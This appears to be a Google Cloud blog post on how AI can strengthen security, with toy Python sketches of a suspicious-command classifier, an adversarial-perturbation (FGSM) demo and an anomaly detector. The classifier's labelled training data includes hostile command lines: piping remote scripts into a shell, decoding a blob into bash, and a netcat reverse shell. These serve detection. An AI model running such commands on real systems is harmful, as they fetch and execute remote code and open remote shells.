How AI can improve digital security

AI is having a transformative moment and causing profound shifts in what’s possible with technology. It has the power to unlock the potential of communities, companies, and countries around the world, bringing meaningful and positive change that could improve billions of people’s lives. As these technologies advance, they also have the potential to vastly improve how we identify, address, and reduce security risks.

We’re at a key moment in our AI journey

Breakthroughs in generative AI are fundamentally changing how people interact with technology. At Google Cloud, we’re committed to helping developers and organizations stay on top of these developments. That’s why we recently announced new generative AI capabilities for our Google Cloud AI portfolio and committed to launching a range of products that responsibly infuse generative AI into our offerings. 

AI principles sit at the core of this work. Google was one of the first companies to introduce and advance responsible AI practices, and these principles serve as an ongoing commitment to our customers worldwide who rely on our products to build and grow their businesses safely.

One of the benefits of our experience using AI to solve real-world problems is that we have become better at helping secure new technologies as they become mainstream. At the same time, we’re leveraging recent AI advances to provide unique, up-to-date, and actionable threat intelligence, improving visibility across attack surfaces and infrastructure. We know that improving cybersecurity is no longer a human-scale problem, and we’re excited to keep working together to prepare for what’s to come.

Our work is rooted in a basic principle: AI can have a major impact for good on the security ecosystem, but only if we are bold and responsible about how we deploy it. We look at this investment like a digital immune system: when we learn and adapt from previous risks to our digital health, our systems become better equipped to protect against, anticipate, and predict future attacks. To maximize the benefits of AI technologies and minimize risks, we take a three-pronged approach: secure, scale, and evolve.

1. Secure: Helping organizations deploy secure AI systems

We are helping organizations deploy secure AI systems. We approach AI systems the same way we view other security challenges: we bake in industry-leading security features (often invisible to users) and secure-by-default protections to keep our users safe. This includes technical controls, contractual protections, and third-party verifications or attestations.

In addition, we have standardized platforms and tools for machine learning that integrate with Google’s data protection, access control, and change management tools. Vertex AI, our machine learning platform for training and deploying ML models and AI applications, allows customers to train models without code and with minimal expertise across a broad range of modeling problems, while eliminating common mistakes, minimizing misconfigurations, and reducing the attack surface. Vertex AI supplements our robust data governance platforms that control data gathering and classification, and we’re committed to the same data responsibilities for machine learning data that we have for conventional data processing.

2. Scale: Leveraging the power of AI to achieve better security outcomes

We are continuing to launch cutting-edge, AI-powered products and services to help organizations achieve better security outcomes at scale. Historically, the security community has taken a reactive approach to threats. While these efforts are important, they’re unsustainable. In today’s dynamic threat environment, organizations struggle to keep up with the pace and scope of attacks, often leaving defenders feeling outmatched.

While AI technologies don’t offer a one-stop solution for all security problems, we’ve seen a few early use cases emerge that show how AI can help level the security playing field.

We already use AI in our products in a number of ways to help relieve humans from the security burdens of incredibly dynamic systems.
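To make the idea of relieving analysts of repetitive triage work concrete, here is a deliberately toy sketch (not a description of any Google product; every command line and label below is invented): a tiny naive Bayes filter that scores shell commands for suspicion, the kind of first-pass classification that AI can do at machine scale so humans only review the flagged cases.

```python
# Toy illustration only: a tiny naive Bayes filter that flags suspicious
# command lines. All training data here is made up for the example.
from collections import Counter
import math

TRAIN = [
    ("curl http://203.0.113.9/x.sh | sh", 1),   # 1 = suspicious
    ("wget -q http://198.51.100.2/payload", 1),
    ("base64 -d /tmp/blob | bash", 1),
    ("nc -e /bin/sh 192.0.2.7 4444", 1),
    ("ls -la /var/log", 0),                     # 0 = benign
    ("git pull origin main", 0),
    ("systemctl status nginx", 0),
    ("tar -czf backup.tar.gz /home", 0),
]

def tokens(line):
    return line.lower().split()

# Per-class token counts; Laplace (add-one) smoothing handles unseen tokens.
counts = {0: Counter(), 1: Counter()}
totals = {0: 0, 1: 0}
for line, label in TRAIN:
    for t in tokens(line):
        counts[label][t] += 1
        totals[label] += 1
vocab = set(counts[0]) | set(counts[1])

def suspicion_score(line):
    """Log-odds that a command line is suspicious rather than benign."""
    score = 0.0
    for t in tokens(line):
        p1 = (counts[1][t] + 1) / (totals[1] + len(vocab))
        p0 = (counts[0][t] + 1) / (totals[0] + len(vocab))
        score += math.log(p1 / p0)
    return score

print(suspicion_score("curl http://203.0.113.9/x.sh | sh"))  # positive
print(suspicion_score("git pull origin main"))               # negative
```

A positive score sends the line to a human for review; a negative score lets it pass. Real systems use far richer features and models, but the division of labor is the same: the model handles volume, the analyst handles judgment.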

Together, these capabilities help organizations take Google’s AI and apply it to security challenges everywhere they operate.

3. Evolve: Adopting a future-state mindset to stay ahead of threats

We are also constantly evolving to stay ahead of threats. AI technologies present novel security risks, and we are working to understand those risks to better protect AI deployments from potential attacks. We operate from the basic assumption that attackers will seek out these technologies and attempt to use them to circumvent defenses, and we are building toward that future state. This includes advancing progress on important topics on the horizon, such as post-quantum cryptography and detecting efforts to evade voice verification via synthetic speech; staying on top of research into adversarial attacks on machine learning and AI systems; and partnering with customers to develop best practices, tools, and threat models that address typical AI interactions and risks.
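One well-studied family of adversarial attacks on machine learning is gradient-based input perturbation, exemplified by the fast gradient sign method (FGSM). The following is a minimal, self-contained sketch (the toy weights and inputs are invented for illustration, not drawn from any real detector) showing why defenders study this: a tiny, targeted nudge to the input can flip a classifier's decision.

```python
# Minimal FGSM sketch on a toy logistic classifier: score > 0 => "malicious".
# Weights and inputs are hand-picked for illustration only.
import math

W = [1.5, -2.0, 0.5]
B = 0.1

def score(x):
    return sum(w * xi for w, xi in zip(W, x)) + B

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def fgsm(x, true_label, eps):
    """Perturb x by eps along the signed gradient of the loss w.r.t. x,
    i.e. in the direction that pushes the classifier toward a mistake."""
    grad_scale = sigmoid(score(x)) - true_label  # dLoss/dscore for logistic loss
    return [xi + eps * math.copysign(1.0, grad_scale * w)
            for xi, w in zip(x, W)]

x = [1.0, 0.2, 0.4]                 # correctly classified as malicious
adv = fgsm(x, true_label=1, eps=0.6)
print(score(x) > 0, score(adv) > 0)  # the decision flips under perturbation
```

The perturbation budget `eps` bounds how much each feature moves; even a small budget can cross the decision boundary, which is why robustness to such perturbations is an active research and red-teaming topic.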

As far back as 2011, for example, Google began using machine learning to detect potential attackers on our internal networks. Today, with investments in AI, we are able to detect our own Red Team attempting to attack our internal systems, and we continue to collaborate with research teams to perform red-team attacks both on and using the latest AI developments.
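The core idea behind that kind of network detection can be sketched, in highly simplified form, as anomaly detection against a learned baseline. The sketch below is illustrative only (the connection counts and threshold are invented; production systems are vastly more sophisticated): a host whose activity falls far outside its historical distribution gets flagged for investigation.

```python
# Illustrative sketch only: flag hosts whose hourly outbound-connection
# count sits far outside a learned baseline. All numbers are invented.
import statistics

# Hypothetical historical hourly connection counts for one internal host.
baseline = [12, 15, 11, 14, 13, 12, 16, 14, 13, 15]

mean = statistics.mean(baseline)
stdev = statistics.stdev(baseline)

def is_anomalous(count, threshold=3.0):
    """Flag counts more than `threshold` standard deviations from the mean."""
    return abs(count - mean) / stdev > threshold

print(is_anomalous(14))   # typical traffic: not flagged
print(is_anomalous(240))  # sudden burst, e.g. beaconing or exfiltration: flagged
```

A real pipeline would model many features per entity and adapt the baseline over time, but the principle is the same one the paragraph describes: learn what normal looks like so the abnormal, including a red team probing from inside, stands out.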
